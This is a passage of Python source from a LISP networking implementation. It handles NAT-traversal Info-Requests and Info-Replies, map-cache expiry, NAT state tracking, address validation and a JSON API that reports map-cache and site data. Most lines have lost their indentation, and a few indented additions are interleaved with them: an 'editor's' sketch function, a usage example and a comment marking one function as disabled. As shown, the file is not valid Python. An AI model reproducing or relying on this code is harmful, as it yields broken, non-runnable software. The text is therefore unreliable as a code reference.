        # only the lisp-etr process will add a host route to the RTR for
        # Info-Requests.
#
if (port == LISP_CTRL_PORT and save_nh != None):
while (True):
time.sleep(.01)
save_nh = lisp_get_host_route_next_hop(addr_str)
if (save_nh == None): break
#endwhile
#endif
default_routes = lisp_get_default_route_next_hops()
for device, nh in default_routes:
if (device != device_name): continue
#
# If there is a data route pointing to same next-hop, don't
# change the routing table. Otherwise, remove saved next-hop,
# add the one we want and later undo this.
#
if (save_nh != nh):
if (save_nh != None):
lisp_install_host_route(addr_str, save_nh, False)
#endif
lisp_install_host_route(addr_str, nh, True)
added_route = True
#endif
break
#endfor
#endif
#
# Encode the Info-Request message and print it.
#
packet = info.encode()
info.print_info()
#
# Send it.
#
cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
cd = bold(cd, False)
p = bold("{}".format(port), False)
a = red(addr_str, False)
rtr = "RTR " if port == LISP_DATA_PORT else "MS "
lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
#
# Send packet to control port via control-sockets interface. For a 4341
# do the same via the lisp-core process but prepend a LISP data header
# to the message.
#
if (port == LISP_CTRL_PORT):
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
else:
header = lisp_data_header()
header.instance_id(0xffffff)
header = header.encode()
if (header):
packet = header + packet
#
# The NAT-traversal spec says to use port 4342 as the source port
# but that would mean return data packets will go to the lisp-core
# process. We are going to use an ephemeral port here so packets
# come to this lisp-etr process. The commented out call is to
# allow Info-Requests to use source port 4342 but will break the
# data-plane in this lispers.net implementation.
#
lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
# lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
#endif
#endif
#
# Remove static route to RTR if had added one and restore data route.
#
if (added_route):
lisp_install_host_route(addr_str, None, False)
if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
#endif
return
#enddef
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
#
# Parse Info-Request so we can return the nonce in the Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return
info.print_info()
#
# Start building the Info-Reply. Copy translated source and translated
# source port from Info-Request.
#
info.info_reply = True
info.global_etr_rloc.store_address(addr_str)
info.etr_port = sport
#
# Put Info-Request hostname (if it was encoded) in private-rloc in
# Info-Reply. Encode it as an AFI=17 distinguished-name.
#
if (info.hostname != None):
info.private_etr_rloc.afi = LISP_AFI_NAME
info.private_etr_rloc.store_address(info.hostname)
#endif
if (rtr_list != None): info.rtr_list = rtr_list
packet = info.encode()
info.print_info()
#
# Send the Info-Reply via the lisp-core process. We are sending from
# a udp46 socket, so we need to prepend ::ffff.
#
lprint("Send Info-Reply to {}".format(red(addr_str, False)))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, sport, packet)
#
# Cache info sources so we can decide to process Map-Requests from it
# specially so we can proxy-Map-Request when the sources are behind NATs.
#
info_source = lisp_info_source(info.hostname, addr_str, sport)
info_source.cache_address_for_info_source()
return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# with signature-eid is True.
#
def lisp_get_signature_eid():
for db in lisp_db_list:
if (db.signature_eid): return(db)
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_port)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devices.
#
def lisp_get_any_translated_rloc():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_rloc)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
rloc_list = []
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.is_rloc_translated() == False): continue
addr = rloc_entry.translated_rloc.print_address_no_iid()
rloc_list.append(addr)
#endfor
#endfor
return(rloc_list)
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
new_rtr_list = {}
for rloc in rtr_list:
if (rloc == None): continue
addr = rtr_list[rloc]
if (ignore_private and addr.is_private_address()): continue
new_rtr_list[rloc] = addr
#endfor
rtr_list = new_rtr_list
prefix_list = []
for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
#
# Do unicast routes. We assume unicast and multicast routes are sync'ed
# with the same RLOC-set.
#
prefix = lisp_address(afi, "", 0, iid)
prefix.make_default_route(prefix)
mc = lisp_map_cache.lookup_cache(prefix, True)
if (mc):
if (mc.checkpoint_entry):
lprint("Updating checkpoint entry for {}".format( \
green(mc.print_eid_tuple(), False)))
elif (mc.do_rloc_sets_match(rtr_list.values())):
continue
#endif
mc.delete_cache()
#endif
prefix_list.append([prefix, ""])
#
# Do multicast routes.
#
group = lisp_address(afi, "", 0, iid)
group.make_default_multicast_route(group)
gmc = lisp_map_cache.lookup_cache(group, True)
if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
if (gmc): gmc.delete_cache()
prefix_list.append([prefix, group])
#endfor
if (len(prefix_list) == 0): return
#
# Build RLOC-set.
#
rloc_set = []
for rtr in rtr_list:
rtr_addr = rtr_list[rtr]
rloc_entry = lisp_rloc()
rloc_entry.rloc.copy_address(rtr_addr)
rloc_entry.priority = 254
rloc_entry.mpriority = 255
rloc_entry.rloc_name = "RTR"
rloc_set.append(rloc_entry)
#endfor
for prefix in prefix_list:
mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
mc.mapping_source = map_resolver
mc.map_cache_ttl = LISP_MR_TTL * 60
mc.add_cache()
lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
green(mc.print_eid_tuple(), False), rtr_list.keys()))
rloc_set = copy.deepcopy(rloc_set)
#endfor
return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
#
# Parse Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return([None, None, False])
info.print_info()
#
# Store RTR list.
#
new_rtr_set = False
for rtr in info.rtr_list:
addr_str = rtr.print_address_no_iid()
if (lisp_rtr_list.has_key(addr_str)):
if (lisp_register_all_rtrs == False): continue
if (lisp_rtr_list[addr_str] != None): continue
#endif
new_rtr_set = True
lisp_rtr_list[addr_str] = rtr
#endfor
#
# If an ITR, install default map-cache entries.
#
if (lisp_i_am_itr and new_rtr_set):
if (lisp_iid_to_interface == {}):
lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
else:
for iid in lisp_iid_to_interface.keys():
lisp_update_default_routes(source, int(iid), lisp_rtr_list)
#endfor
#endif
#endif
#
# Either store in database-mapping entries or return to caller.
#
if (store == False):
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#endif
#
# If no private-etr-rloc was supplied in the Info-Reply, use the global
# RLOC for all private RLOCs in the database-mapping entries.
#
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
rloc = rloc_entry.rloc
interface = rloc_entry.interface
if (interface == None):
if (rloc.is_null()): continue
if (rloc.is_local() == False): continue
if (info.private_etr_rloc.is_null() == False and
rloc.is_exact_match(info.private_etr_rloc) == False):
continue
#endif
elif (info.private_etr_rloc.is_dist_name()):
rloc_name = info.private_etr_rloc.address
if (rloc_name != rloc_entry.rloc_name): continue
#endif
eid_str = green(db.eid.print_prefix(), False)
rloc_str = red(rloc.print_address_no_iid(), False)
rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
if (rloc_entry.translated_port == 0 and rlocs_match):
lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
interface, eid_str))
continue
#endif
#
# Nothing changed?
#
translated = info.global_etr_rloc
stored = rloc_entry.translated_rloc
if (stored.is_exact_match(translated) and
info.etr_port == rloc_entry.translated_port): continue
lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
format(red(info.global_etr_rloc.print_address_no_iid(), False),
info.etr_port, rloc_str, interface, eid_str))
rloc_entry.store_translated_rloc(info.global_etr_rloc,
info.etr_port)
#endfor
#endfor
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers.
#
def lisp_test_mr(lisp_sockets, port):
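    #
    # This function is disabled; the bare return below makes the code that
    # follows unreachable.
    #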
return
lprint("Test Map-Resolvers")
eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
#
# Send 10.0.0.1 and 192.168.0.1
#
eid.store_address("10.0.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
eid.store_address("192.168.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
#
# Send 0100::1 and 8000::1.
#
eid6.store_address("0100::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
eid6.store_address("8000::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
#
# Restart periodic timer.
#
lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
[lisp_sockets, port])
lisp_test_mr_timer.start()
return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is check to see if the private address changed since this
# ETR could have moved to another NAT or the same NAT device reassigned a
# new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
if (rloc.interface == None): return
addr = lisp_get_interface_address(rloc.interface)
if (addr == None): return
old = rloc.rloc.print_address_no_iid()
new = addr.print_address_no_iid()
if (old == new): return
lprint("Local interface address changed on {} from {} to {}".format( \
rloc.interface, old, new))
rloc.rloc.copy_address(addr)
lisp_myrlocs[0] = addr
return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
for rloc in mc.rloc_set:
nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
if (nat_info == None): continue
if (rloc.translated_port == nat_info.port): continue
lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
"EID-prefix {}").format(rloc.translated_port, nat_info.port,
red(rloc.rloc.print_address_no_iid(), False),
green(mc.print_eid_tuple(), False)))
rloc.store_translated_rloc(rloc.rloc, nat_info.port)
#endfor
return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due to timer expiry.
# If the entry does not time out, go through the RLOC-set to see if the
# encapsulation port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (an Arista platform specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
if (mc.map_cache_ttl == None):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
now = lisp_get_timestamp()
#
# Check refresh timers. Native-Forward entries just return if active,
# else check for encap-port changes for NAT entries. Then return if
# entry still active.
#
if (mc.last_refresh_time + mc.map_cache_ttl > now):
if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#
# Do not time out NAT-traversal default entries (0.0.0.0/0 and 0::/0).
#
if (lisp_nat_traversal and mc.eid.address == 0 and mc.eid.mask_len == 0):
return([True, delete_list])
#endif
#
# Timed out.
#
elapsed = lisp_print_elapsed(mc.last_refresh_time)
prefix_str = mc.print_eid_tuple()
lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}". \
format(green(prefix_str, False), bold("timed out", False), elapsed))
#
# Add to delete-list to remove after this loop.
#
delete_list.append(mc)
return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
delete_list = parms[0]
checkpoint_list = parms[1]
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()):
status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
if (delete_list == [] or mc != delete_list[-1]):
checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
#endif
return([status, parms])
#endif
if (mc.source_cache == None): return([True, parms])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
def lisp_timeout_map_cache(lisp_map_cache):
parms = [[], []]
parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)
#
    # Now remove from the map-cache all the timed-out entries on the
# delete_list[].
#
delete_list = parms[0]
for mc in delete_list: mc.delete_cache()
#
# Write contents of checkpoint_list array to checkpoint file.
#
checkpoint_list = parms[1]
lisp_checkpoint(checkpoint_list)
return
#enddef
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
# The lisp_nat_state_info{} dictionary is keyed by Info-Request hostname and
# holds an array of lisp_nat_info() values. We keep all the current and
# previous NAT state associated with the hostname so we can track how much
# movement is occurring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
def lisp_store_nat_info(hostname, rloc, port):
addr_str = rloc.print_address_no_iid()
msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
blue(hostname, False), red(addr_str, False), port)
new_nat_info = lisp_nat_info(addr_str, hostname, port)
if (lisp_nat_state_info.has_key(hostname) == False):
lisp_nat_state_info[hostname] = [new_nat_info]
lprint(msg.format("Store initial"))
return(True)
#endif
#
# The youngest entry is always the first element. So check to see if this
# is a refresh of the youngest (current) entry.
#
nat_info = lisp_nat_state_info[hostname][0]
if (nat_info.address == addr_str and nat_info.port == port):
nat_info.uptime = lisp_get_timestamp()
lprint(msg.format("Refresh existing"))
return(False)
#endif
#
    # So the new state does not match the youngest entry. See if it exists
    # as an older entry. If not, we prepend the new state; otherwise, we
    # remove the old entry from the array and prepend the new state.
#
old_entry = None
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str and nat_info.port == port):
old_entry = nat_info
break
#endif
#endfor
if (old_entry == None):
lprint(msg.format("Store new"))
else:
lisp_nat_state_info[hostname].remove(old_entry)
lprint(msg.format("Use previous"))
#endif
existing = lisp_nat_state_info[hostname]
lisp_nat_state_info[hostname] = [new_nat_info] + existing
return(True)
#enddef
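#
# Editor's illustrative sketch (not part of the original lispers.net code):
# lisp_store_nat_info() above keeps a most-recently-used list per hostname,
# youngest state first. The list manipulation, reduced to a plain dict of
# entries (the timestamp-refresh case above is omitted):
#
def lisp_example_mru_prepend(state, hostname, entry):
    if (hostname not in state):
        state[hostname] = [entry]
        return
    #endif
    if (entry in state[hostname]): state[hostname].remove(entry)
    state[hostname] = [entry] + state[hostname]
#enddef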
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
if (lisp_nat_state_info.has_key(hostname) == False): return(None)
addr_str = rloc.print_address_no_iid()
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str): return(nat_info)
#endfor
return(None)
#enddef
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the
# NAT interface we are sending the 4341 Info-Request on, and install an
# ephemeral static route to force the Info-Request out a specific interface.
#
def lisp_build_info_requests(lisp_sockets, dest, port):
if (lisp_nat_traversal == False): return
#
# Send Info-Request to each configured Map-Resolver and exit loop.
# If we don't find one, try finding a Map-Server. We may send Info-
# Request to an RTR to open up NAT state.
#
dest_list = []
mr_list = []
if (dest == None):
for mr in lisp_map_resolvers_list.values():
mr_list.append(mr.map_resolver)
        #endfor
dest_list = mr_list
if (dest_list == []):
for ms in lisp_map_servers_list.values():
dest_list.append(ms.map_server)
#endfor
#endif
if (dest_list == []): return
else:
dest_list.append(dest)
#endif
#
# Find the NAT-traversed interfaces.
#
rloc_list = {}
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
lisp_update_local_rloc(rloc_entry)
if (rloc_entry.rloc.is_null()): continue
if (rloc_entry.interface == None): continue
addr = rloc_entry.rloc.print_address_no_iid()
if (addr in rloc_list): continue
rloc_list[addr] = rloc_entry.interface
#endfor
#endfor
if (rloc_list == {}):
lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
"found in any database-mappings")
return
#endif
#
# Send out Info-Requests out the NAT-traversed interfaces that have
# addresses assigned on them.
#
for addr in rloc_list:
interface = rloc_list[addr]
a = red(addr, False)
lprint("Build Info-Request for private address {} ({})".format(a,
interface))
device = interface if len(rloc_list) > 1 else None
for dest in dest_list:
lisp_send_info_request(lisp_sockets, dest, port, device)
#endfor
#endfor
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
if (mr_list != []):
for mr in lisp_map_resolvers_list.values():
mr.resolve_dns_name()
#endfor
#endif
return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating IPv4, IPv6
# and MAC addresses.
#
def lisp_valid_address_format(kw, value):
if (kw != "address"): return(True)
#
# Check if address is a Distinguished-Name. Must have single quotes.
# Check this first because names could have ".", ":", or "-" in them.
#
if (value[0] == "'" and value[-1] == "'"): return(True)
#
# Do IPv4 test for dotted decimal x.x.x.x.
#
if (value.find(".") != -1):
addr = value.split(".")
if (len(addr) != 4): return(False)
for byte in addr:
if (byte.isdigit() == False): return(False)
if (int(byte) > 255): return(False)
#endfor
return(True)
#endif
#
# Test for a geo-prefix. They have N, S, W, E characters in them.
#
if (value.find("-") != -1):
addr = value.split("-")
for i in ["N", "S", "W", "E"]:
if (i in addr):
if (len(addr) < 8): return(False)
return(True)
#endif
#endfor
#endif
#
# Do MAC test in format xxxx-xxxx-xxxx.
#
if (value.find("-") != -1):
addr = value.split("-")
if (len(addr) != 3): return(False)
for hexgroup in addr:
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do IPv6 test in format aaaa:bbbb::cccc:dddd
#
if (value.find(":") != -1):
addr = value.split(":")
if (len(addr) < 2): return(False)
found_null = False
count = 0
for hexgroup in addr:
count += 1
if (hexgroup == ""):
if (found_null):
if (len(addr) == count): break
if (count > 2): return(False)
#endif
found_null = True
continue
#endif
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
#
if (value[0] == "+"):
addr = value[1::]
for digit in addr:
if (digit.isdigit() == False): return(False)
#endfor
return(True)
#endif
return(False)
#enddef
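#
# Illustrative usage (editor's addition): example strings the validator
# above accepts and rejects, usable as a quick sanity check.
#
def lisp_example_valid_address_formats():
    accepted = ["10.0.0.1", "aabb-ccdd-eeff", "fe80::1", "+14085551212",
        "'my-dist-name'"]
    rejected = ["10.0.0.256", "10.0.0", "aabb-ccdd", "not-an-address"]
    ok = all(lisp_valid_address_format("address", a) for a in accepted)
    bad = any(lisp_valid_address_format("address", r) for r in rejected)
    return(ok and bad == False)
#enddef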
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them to the LISP process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
def lisp_process_api(process, lisp_socket, data_structure):
api_name, parms = data_structure.split("%")
lprint("Process API request '{}', parameters: '{}'".format(api_name,
parms))
data = []
if (api_name == "map-cache"):
if (parms == ""):
data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
else:
data = lisp_process_api_map_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache"):
if (parms == ""):
data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
data)
else:
data = lisp_process_api_site_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "map-server"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(True, parms)
#endif
if (api_name == "map-resolver"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(False, parms)
#endif
if (api_name == "database-mapping"):
data = lisp_process_api_database_mapping()
#endif
#
# Send IPC back to lisp-core process.
#
data = json.dumps(data)
ipc = lisp_api_ipc(process, data)
lisp_ipc(ipc, lisp_socket, "lisp-core")
return
#enddef
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))
if (mc.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
return([True, data])
#enddef
#
# lisp_gather_map_cache_data
#
# Return map-cache to API caller.
#
def lisp_gather_map_cache_data(mc, data):
entry = {}
entry["instance-id"] = str(mc.eid.instance_id)
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
if (mc.group.is_null() == False):
entry["group-prefix"] = mc.group.print_prefix_no_iid()
#endif
entry["uptime"] = lisp_print_elapsed(mc.uptime)
entry["expires"] = lisp_print_elapsed(mc.uptime)
entry["action"] = lisp_map_reply_action_string[mc.action]
entry["ttl"] = "--" if mc.map_cache_ttl == None else \
str(mc.map_cache_ttl / 60)
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in mc.rloc_set:
r = lisp_fill_rloc_in_json(rloc)
#
# If this is a multicast RLOC, then add the array for member RLOCs
# that may have responded to a multicast RLOC-probe.
#
if (rloc.rloc.is_multicast_address()):
r["multicast-rloc-set"] = []
for mrloc in rloc.multicast_rloc_probe_list.values():
mr = lisp_fill_rloc_in_json(mrloc)
r["multicast-rloc-set"].append(mr)
#endfor
#endif
rloc_set.append(r)
#endfor
entry["rloc-set"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_fill_rloc_in_json
#
# Fill in fields from lisp_rloc() into the JSON that is reported via the
# restful API.
#
def lisp_fill_rloc_in_json(rloc):
r = {}
if (rloc.rloc_exists()):
r["address"] = rloc.rloc.print_address_no_iid()
#endif
if (rloc.translated_port != 0):
r["encap-port"] = str(rloc.translated_port)
#endif
r["state"] = rloc.print_state()
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
stats = rloc.stats.get_stats(False, False)
if (stats): r["stats"] = stats
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
reply = rloc.last_rloc_probe_reply
if (reply):
r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
#endif
r["rloc-hop-count"] = rloc.rloc_probe_hops
r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
r["rloc-probe-latency"] = rloc.rloc_probe_latency
r["recent-rloc-probe-latencies"] = rloc.recent_rloc_probe_latencies
recent_rtts = []
for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
r["recent-rloc-probe-rtts"] = recent_rtts
return(r)
#enddef
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
dest = eid
source = eid
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
dest = group
#endif
data = []
mc = lisp_map_cache_lookup(source, dest)
if (mc): status, data = lisp_process_api_map_cache(mc, data)
return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_site_cache(se, data):
#
# There is only destination state in this map-cache entry.
#
if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))
if (se.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
return([True, data])
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return map-cache to API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
address = lisp_address(LISP_AFI_NONE, "", 0, 0)
dns_name = data["dns-name"] if data.has_key("dns-name") else None
if (data.has_key("address")):
address.store_address(data["address"])
#endif
value = {}
if (ms_or_mr):
for ms in lisp_map_servers_list.values():
if (dns_name):
if (dns_name != ms.dns_name): continue
else:
if (address.is_exact_match(ms.map_server) == False): continue
#endif
value["dns-name"] = ms.dns_name
value["address"] = ms.map_server.print_address_no_iid()
value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
return([value])
#endfor
else:
for mr in lisp_map_resolvers_list.values():
if (dns_name):
if (dns_name != mr.dns_name): continue
else:
if (address.is_exact_match(mr.map_resolver) == False): continue
#endif
value["dns-name"] = mr.dns_name
value["address"] = mr.map_resolver.print_address_no_iid()
value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
return([value])
#endfor
#endif
return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of database-mappings configured, include dynamic data like
# translated_rloc in particular.
#
def lisp_process_api_database_mapping():
data = []
for db in lisp_db_list:
entry = {}
entry["eid-prefix"] = db.eid.print_prefix()
if (db.group.is_null() == False):
entry["group-prefix"] = db.group.print_prefix()
#endif
rlocs = []
for r in db.rloc_set:
rloc = {}
if (r.rloc.is_null() == False):
rloc["rloc"] = r.rloc.print_address_no_iid()
#endif
if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
if (r.interface != None): rloc["interface"] = r.interface
tr = r.translated_rloc
if (tr.is_null() == False):
rloc["translated-rloc"] = tr.print_address_no_iid()
#endif
if (rloc != {}): rlocs.append(rloc)
#endfor
#
# Add RLOCs array to EID entry.
#
entry["rlocs"] = rlocs
#
# Add EID entry to return array.
#
data.append(entry)
#endfor
return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Return site-cache to API caller.
#
def lisp_gather_site_cache_data(se, data):
entry = {}
entry["site-name"] = se.site.site_name
entry["instance-id"] = str(se.eid.instance_id)
entry["eid-prefix"] = se.eid.print_prefix_no_iid()
if (se.group.is_null() == False):
entry["group-prefix"] = se.group.print_prefix_no_iid()
#endif
entry["registered"] = "yes" if se.registered else "no"
entry["first-registered"] = lisp_print_elapsed(se.first_registered)
entry["last-registered"] = lisp_print_elapsed(se.last_registered)
addr = se.last_registerer
addr = "none" if addr.is_null() else addr.print_address()
entry["last-registerer"] = addr
entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
entry["dynamic"] = "yes" if (se.dynamic) else "no"
entry["site-id"] = str(se.site_id)
if (se.xtr_id_present):
entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
#endif
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in se.registered_rlocs:
r = {}
r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
else "none"
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, True)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
rloc_set.append(r)
#endfor
entry["registered-rlocs"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
#endif
data = []
se = lisp_site_eid_lookup(eid, group, False)
if (se): lisp_gather_site_cache_data(se, data)
return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
